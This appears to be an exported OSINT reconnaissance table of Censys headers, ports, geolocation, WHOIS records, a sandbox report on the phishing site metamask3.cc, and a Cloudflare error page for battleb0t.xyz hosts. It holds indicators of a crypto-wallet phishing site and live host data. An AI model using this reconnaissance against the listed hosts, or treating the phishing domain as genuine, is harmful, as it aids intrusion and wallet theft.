| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.168.252 |
| 2023-05-12 02:45:12 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3031::ac43:8709', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2095 | 104.21.71.14 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:35 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | leanna.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 03:17:36 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: aahu.xyz
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2023-04-10T07:00:00Z
Creation Date: 2022-04-10T07:00:00Z
Registrar Registration Expiration Date: 2023-04-10T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Name Server: hugh.ns.cloudflare.com
Name Server: ryleigh.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:00:00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in our WHOIS database is provided for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. We do not guarantee its accuracy. By submitting a WHOIS
query, you agree to abide by the following terms of use: You agree that you may
use this Data only for lawful purposes and that under no circumstances will you
use this Data to: (1) allow, enable, or otherwise support the transmission of
mass unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes that
apply to us (or our computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without our
prior written consent. We reserve the right to terminate your access to the
WHOIS database at our sole discretion, including without limitation, for
excessive querying of the WHOIS database or for failure to otherwise abide by
this policy. We reserve the right to modify these terms at any time.
Domains - cheap, easy, and secure at NameSilo.com
https://www.namesilo.com
Register your domain now at www.NameSilo.com - Domains. Cheap, Fast and Secure
| aahu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Klovenier (Net ID: 00:01:36:06:40:52) | 52.3759, 4.8975 |
| 2023-05-12 02:46:01 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:00'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.196.30.220', u'continent': u'North America', u'region_iso_code': u'SC'} | 104.196.30.220 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5a3c76a8562af2-ORD"]} | 188.114.97.1 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Pragma": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Pragma": ["no-cache"], "Set_Cookie": ["cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "cpsession=%3aQkwdhfWxmK8h0n7J%2c873f8738210af1095901a669c6d9b2d7; HttpOnly; path=/; port=2083; secure", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2083; secure", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083; secure", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2083"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:45:46 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamask3.cc/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_1e4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_1e4_ConnHashTable<484>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_1e4_IESQMMUTEX_0_303"\n "IsoScope_1e4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_1e4_IE_EarlyTabStart_0xda8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_484"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"103.60.109.137:80"\n "185.199.111.153:443"\n "65.8.165.91:443"\n "58.216.15.119:443"\n "142.251.32.42:80"\n "142.251.46.163:443"\n "142.250.188.3:80"\n "104.16.89.50:443"\n "104.17.210.243:443"\n "104.17.214.243:443"\n "142.250.189.238:443"\n "142.250.188.3:443"\n "142.251.46.194:443"\n "142.251.46.230:443"\n "142.250.189.202:443"\n "172.217.164.118:443"\n "142.250.189.161:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamask3.cc"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /fonts/EuclidCircularB-Regular-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"\n "GET /fonts/EuclidCircularB-Bold-WebXL.woff HTTP/1.1\nAccept: */*\nReferer: http://metamask3.cc/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: http://metamask3.cc\nAccept-Encoding: gzip, deflate\nHost: metamask3.cc\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.embedly.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "metamask.io"\n "metamask3.cc"\n "perf.hsforms.com"\n "s4.cnzz.com"\n "static.doubleclick.net"\n "www.gstatic.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "qk.prototype.remove=function(a){this.g&&this.g.remove(a);var b=this.h;be.remove(""+a,"/",void 0===b?"youtube.com":b)};var rk=function(){var a;return function(){a||(a=new qk("ytidb"));return a}}();" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string ""undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Fp();var qq=z.onYTReady;qq&&qq();var rq=z.onYouTubeIframeAPIReady;rq&&rq();var sq=z.onYouTubePlayerAPIReady;sq&&sq();}).call(this);" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "5IBMEWA7.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-close-black_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FE2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FB1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "maxresdefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1280x720 components 3" and extension "jpg"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "Unknown" and extension "png"\n "dapp-uniswap_1_.png" has type "Unknown" and extension "png"\n "dapp-gitcoin_1_.png" has type "Unknown" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "unnamed_1_.jpg" has type "Unknown" and extension "jpg"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FB0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FB0.tmp]- [targetUID: 00000000-00000852]\n "Cab1FE1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FE1.tmp]- [targetUID: 00000000-00000852]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "social-35_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "base_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "v2_1_.js" has type "UTF-8 Unicode text with very l | 185.199.111.153 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 03:24:22 GMT", "content-type": "text/html"} |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
